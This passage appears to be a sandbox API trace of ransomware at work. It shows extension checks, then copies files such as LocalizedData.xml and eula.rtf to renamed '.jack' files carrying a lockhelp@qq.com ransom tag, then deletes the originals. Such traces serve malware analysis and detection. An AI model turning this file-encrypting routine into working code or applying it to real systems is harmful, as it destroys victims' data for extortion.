(lpString=".docx") returned 5 [0196.180] lstrcmpiW (lpString1=".docx", lpString2="t.log") returned -1 [0196.180] lstrlenW (lpString=".pdf") returned 4 [0196.180] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0196.180] lstrlenW (lpString=".xls") returned 4 [0196.180] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0196.180] lstrlenW (lpString=".xlsx") returned 5 [0196.180] lstrcmpiW (lpString1=".xlsx", lpString2="t.log") returned -1 [0196.180] lstrlenW (lpString=".ppt") returned 4 [0196.180] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0196.180] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.180] lstrlenW (lpString=".zip") returned 4 [0196.180] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0196.180] lstrlenW (lpString=".rar") returned 4 [0196.180] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0196.180] lstrlenW (lpString=".bz2") returned 4 [0196.180] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0196.180] lstrlenW (lpString=".7z") returned 3 [0196.180] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0196.180] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.180] lstrlenW (lpString=".dbf") returned 4 [0196.180] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0196.180] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.180] lstrlenW (lpString=".1cd") returned 4 [0196.180] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0196.180] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.180] lstrlenW (lpString=".jpg") returned 4 [0196.180] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0196.181] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.181] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.181] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.393] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=74214) returned 1 [0196.393] CloseHandle (hObject=0x3ec) returned 1 [0196.393] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 0x80 [0196.394] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.394] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.394] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.394] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.394] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.394] GetLastError () returned 0x0 [0196.394] ReadFile (in: hFile=0x3ec, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x121e6, lpOverlapped=0x0) returned 1 [0196.397] WriteFile (in: hFile=0x3f0, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x121f0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x121f0, lpOverlapped=0x0) returned 1 [0196.399] ReadFile (in: hFile=0x3ec, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.399] WriteFile (in: hFile=0x3f0, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0196.400] SetEndOfFile (hFile=0x3f0) returned 1 [0196.400] CloseHandle (hObject=0x3f0) returned 1 [0196.405] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.405] SetEndOfFile (hFile=0x3ec) returned 1 [0196.407] CloseHandle (hObject=0x3ec) returned 1 [0196.407] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.407] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 1 [0196.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.408] lstrlenW (lpString=".doc") returned 4 [0196.408] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString=".docx") returned 5 [0196.408] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.408] lstrlenW (lpString=".pdf") returned 4 [0196.408] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString=".xls") returned 4 [0196.408] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString=".xlsx") returned 5 [0196.408] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.408] lstrlenW (lpString=".ppt") returned 4 [0196.408] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.408] lstrlenW (lpString=".zip") returned 4 [0196.408] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.408] lstrlenW (lpString=".rar") returned 4 [0196.408] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString=".bz2") returned 4 [0196.408] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString=".7z") returned 3 [0196.408] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.408] lstrlenW (lpString=".dbf") returned 4 [0196.408] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.408] lstrlenW (lpString=".1cd") returned 4 [0196.408] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.409] lstrlenW (lpString=".jpg") returned 4 [0196.409] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.409] lstrlenW (lpString=".doc") returned 4 [0196.409] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString=".docx") returned 5 [0196.409] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.409] lstrlenW (lpString=".pdf") returned 4 [0196.409] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString=".xls") returned 4 [0196.409] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString=".xlsx") returned 5 [0196.409] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.409] lstrlenW (lpString=".ppt") returned 4 [0196.409] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.409] lstrlenW (lpString=".zip") returned 4 [0196.409] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.409] lstrlenW (lpString=".rar") returned 4 [0196.409] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString=".bz2") returned 4 [0196.409] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.409] lstrlenW (lpString=".7z") returned 3 [0196.409] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.409] lstrlenW (lpString=".dbf") returned 4 [0196.410] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.410] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.410] lstrlenW (lpString=".1cd") returned 4 [0196.410] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.410] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0196.410] lstrlenW (lpString=".jpg") returned 4 [0196.410] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.410] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.410] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.410] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.821] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=60816) returned 1 [0196.821] CloseHandle (hObject=0x3fc) returned 1 [0196.821] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 0x80 [0196.821] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.821] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.821] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.821] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.821] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0196.822] GetLastError () returned 0x0 [0196.822] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xed90, lpOverlapped=0x0) returned 1 [0196.850] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xeda0, lpOverlapped=0x0) returned 1 [0196.853] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.853] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0196.853] SetEndOfFile (hFile=0x404) returned 1 [0196.853] CloseHandle (hObject=0x404) returned 1 [0196.857] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.857] SetEndOfFile (hFile=0x3fc) returned 1 [0196.859] CloseHandle (hObject=0x3fc) returned 1 [0196.859] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.859] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 1 [0196.860] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.860] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.860] lstrlenW (lpString=".doc") returned 4 [0196.860] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.860] lstrlenW (lpString=".docx") returned 5 [0196.860] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.860] lstrlenW (lpString=".pdf") returned 4 [0196.860] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.860] lstrlenW (lpString=".xls") returned 4 [0196.860] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.860] lstrlenW (lpString=".xlsx") returned 5 [0196.860] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.860] lstrlenW (lpString=".ppt") returned 4 [0196.860] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.860] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.860] lstrlenW (lpString=".zip") returned 4 [0196.860] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.861] lstrlenW (lpString=".rar") returned 4 [0196.861] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.861] lstrlenW (lpString=".bz2") returned 4 [0196.861] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.861] lstrlenW (lpString=".7z") returned 3 [0196.861] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.861] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.861] lstrlenW (lpString=".dbf") returned 4 [0196.861] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.861] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.861] lstrlenW (lpString=".1cd") returned 4 [0196.861] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.861] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.861] lstrlenW (lpString=".jpg") returned 4 [0196.861] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.861] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.861] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.861] lstrlenW (lpString=".doc") returned 4 [0196.862] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.862] lstrlenW (lpString=".docx") returned 5 [0196.862] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.862] lstrlenW (lpString=".pdf") returned 4 [0196.862] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.862] lstrlenW (lpString=".xls") returned 4 [0196.862] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.862] lstrlenW (lpString=".xlsx") returned 5 [0196.862] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.862] lstrlenW (lpString=".ppt") returned 4 [0196.862] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.862] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.862] lstrlenW (lpString=".zip") returned 4 [0196.862] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.862] lstrlenW (lpString=".rar") returned 4 [0196.862] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.862] lstrlenW (lpString=".bz2") returned 4 [0196.862] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.862] lstrlenW (lpString=".7z") returned 3 [0196.862] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.863] lstrlenW (lpString=".dbf") returned 4 [0196.863] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.863] lstrlenW (lpString=".1cd") returned 4 [0196.863] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0196.863] lstrlenW (lpString=".jpg") returned 4 [0196.863] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.863] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.863] lstrlenW (lpString="eula.rtf") returned 8 [0196.863] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.864] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=8876) returned 1 [0196.864] CloseHandle (hObject=0x3fc) returned 1 [0196.864] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 0x80 [0196.864] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.865] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.865] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.865] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.865] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0196.865] GetLastError () returned 0x0 [0196.865] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x22ac, lpOverlapped=0x0) returned 1 [0196.872] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x22b0, lpOverlapped=0x0) returned 1 [0196.874] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.874] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.874] SetEndOfFile (hFile=0x404) returned 1 [0196.874] CloseHandle (hObject=0x404) returned 1 [0196.877] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.878] SetEndOfFile (hFile=0x3fc) returned 1 [0196.879] CloseHandle (hObject=0x3fc) returned 1 [0196.879] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.879] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 1 [0196.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.879] lstrlenW (lpString=".doc") returned 4 [0196.879] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.879] lstrlenW (lpString=".docx") returned 5 [0196.880] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.880] lstrlenW (lpString=".pdf") returned 4 [0196.880] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.880] lstrlenW (lpString=".xls") returned 4 [0196.880] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.880] lstrlenW (lpString=".xlsx") returned 5 [0196.880] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.880] lstrlenW (lpString=".ppt") returned 4 [0196.880] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.880] lstrlenW (lpString=".zip") returned 4 [0196.880] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.880] lstrlenW (lpString=".rar") returned 4 [0196.880] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.880] lstrlenW (lpString=".bz2") returned 4 [0196.880] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.880] lstrlenW (lpString=".7z") returned 3 [0196.880] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.880] lstrlenW (lpString=".dbf") returned 4 [0196.880] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.880] lstrlenW (lpString=".1cd") returned 4 [0196.880] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.880] lstrlenW (lpString=".jpg") returned 4 [0196.880] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.881] lstrlenW (lpString=".doc") returned 4 [0196.881] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString=".docx") returned 5 [0196.881] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.881] lstrlenW (lpString=".pdf") returned 4 [0196.881] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString=".xls") returned 4 [0196.881] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.881] lstrlenW (lpString=".xlsx") returned 5 [0196.881] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.881] lstrlenW (lpString=".ppt") returned 4 [0196.881] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.881] lstrlenW (lpString=".zip") returned 4 [0196.881] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.881] lstrlenW (lpString=".rar") returned 4 [0196.881] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString=".bz2") returned 4 [0196.881] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString=".7z") returned 3 [0196.881] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.881] lstrlenW (lpString=".dbf") returned 4 [0196.881] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.881] lstrlenW (lpString=".1cd") returned 4 [0196.881] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0196.882] lstrlenW (lpString=".jpg") returned 4 [0196.882] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.882] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.882] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.882] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.882] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=86284) returned 1 [0196.882] CloseHandle (hObject=0x3fc) returned 1 [0196.882] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 0x80 [0196.882] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 